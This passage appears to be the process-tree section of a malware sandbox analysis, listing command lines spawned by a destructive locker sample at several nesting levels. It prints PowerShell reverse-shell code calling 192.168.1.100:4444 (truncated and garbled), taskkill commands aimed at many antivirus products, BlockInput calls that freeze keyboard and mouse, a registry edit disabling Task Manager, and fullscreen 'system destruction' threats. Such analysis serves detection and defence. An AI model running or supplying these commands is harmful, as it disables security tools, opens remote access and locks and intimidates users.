        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        27⤵
        
        PID:1304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        27⤵
        
        PID:2588
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        27⤵
        
        PID:2256
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        27⤵
        Kills process with taskkill
        
        PID:1596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        27⤵
        
        PID:1860
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        27⤵
        
        PID:2836
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        27⤵
        Kills process with taskkill
        
        PID:1368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        27⤵
        
        PID:1468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        27⤵
        
        PID:2124
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        27⤵
        
        PID:2780
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        27⤵
        
        PID:1536
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        27⤵
        
        PID:2772
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        27⤵
        
        PID:2936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        25⤵
        
        PID:524
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4b8hnmon.cmdline"
        26⤵
        
        PID:1112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        25⤵
        
        PID:276
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cvyyfs8o.cmdline"
        26⤵
        
        PID:1244
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE60C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE60B.tmp"
        27⤵
        
        PID:1512
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        25⤵
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        25⤵
        
        PID:1700
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oafahoyk.cmdline"
        26⤵
        
        PID:2044
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF104.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF103.tmp"
        27⤵
        
        PID:2780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        25⤵
        
        PID:3020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        25⤵
        
        PID:2460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        25⤵
        Kills process with taskkill
        
        PID:2128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        25⤵
        
        PID:2956
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        25⤵
        
        PID:2272
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        25⤵
        
        PID:2552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        25⤵
        Kills process with taskkill
        
        PID:2400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        25⤵
        
        PID:2408
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        25⤵
        
        PID:1144
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        25⤵
        
        PID:3068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        25⤵
        
        PID:2964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        25⤵
        
        PID:1664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        25⤵
        
        PID:2968
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        25⤵
        
        PID:2972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        25⤵
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        23⤵
        
        PID:2920
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gs-pncii.cmdline"
        24⤵
        
        PID:2896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        23⤵
        
        PID:2912
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8jo8r80j.cmdline"
        24⤵
        
        PID:1772
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDCD8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDCD7.tmp"
        25⤵
        
        PID:2920
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        23⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        23⤵
        
        PID:1960
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0wp_tkt7.cmdline"
        24⤵
        
        PID:2760
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5ED.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE5EC.tmp"
        25⤵
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        23⤵
        
        PID:3012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1760
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        23⤵
        
        PID:2332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        23⤵
        
        PID:2976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        23⤵
        Kills process with taskkill
        
        PID:2892
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        23⤵
        Kills process with taskkill
        
        PID:1760
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        23⤵
        
        PID:2012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        23⤵
        Kills process with taskkill
        
        PID:2112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        23⤵
        
        PID:340
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        23⤵
        
        PID:2332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        23⤵
        Kills process with taskkill
        
        PID:2892
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        23⤵
        
        PID:1512
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        23⤵
        
        PID:904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        23⤵
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        21⤵
        
        PID:2928
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xjzxkvzj.cmdline"
        22⤵
        
        PID:1392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        21⤵
        
        PID:2376
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ustaeqic.cmdline"
        22⤵
        
        PID:2664
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD99E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD99D.tmp"
        23⤵
        
        PID:2660
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        21⤵
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        21⤵
        
        PID:348
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\va8exqrq.cmdline"
        22⤵
        
        PID:2668
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC3C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDC3B.tmp"
        23⤵
        
        PID:2840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        21⤵
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        21⤵
        
        PID:1756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        21⤵
        
        PID:1976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        21⤵
        Kills process with taskkill
        
        PID:1304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        21⤵
        
        PID:1624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        21⤵
        
        PID:752
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        21⤵
        Kills process with taskkill
        
        PID:2256
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        21⤵
        
        PID:2444
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        21⤵
        Kills process with taskkill
        
        PID:2752
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        21⤵
        
        PID:1512
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        21⤵
        
        PID:2136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        21⤵
        
        PID:1792
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        21⤵
        
        PID:1624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        21⤵
        
        PID:2760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        21⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:492
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\driqmf61.cmdline"
        20⤵
        
        PID:1112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        19⤵
        
        PID:2096
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v_x6z0bs.cmdline"
        20⤵
        
        PID:2392
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD07A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD079.tmp"
        21⤵
        
        PID:1112
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        19⤵
        
        PID:2332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        19⤵
        
        PID:2496
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvcaxgtd.cmdline"
        20⤵
        
        PID:1160
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp"
        21⤵
        
        PID:1440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        19⤵
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3056
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        19⤵
        
        PID:1136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        19⤵
        
        PID:2156
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        19⤵
        Kills process with taskkill
        
        PID:2768
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        19⤵
        Kills process with taskkill
        
        PID:1912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        19⤵
        
        PID:1608
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        19⤵
        
        PID:2964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        19⤵
        
        PID:2516
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        19⤵
        Kills process with taskkill
        
        PID:2136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        19⤵
        
        PID:2760
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        19⤵
        
        PID:2620
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        19⤵
        
        PID:340
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        19⤵
        
        PID:2716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        19⤵
        
        PID:1828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        17⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1160
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dbfdt0fz.cmdline"
        18⤵
        
        PID:2752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        17⤵
        
        PID:2428
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hvah0fax.cmdline"
        18⤵
        
        PID:2632
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF90.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF8F.tmp"
        19⤵
        
        PID:1780
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        17⤵
        
        PID:280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2620
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nedid9ix.cmdline"
        18⤵
        
        PID:2208
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD75C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD75B.tmp"
        19⤵
        
        PID:1340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        17⤵
        
        PID:2776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
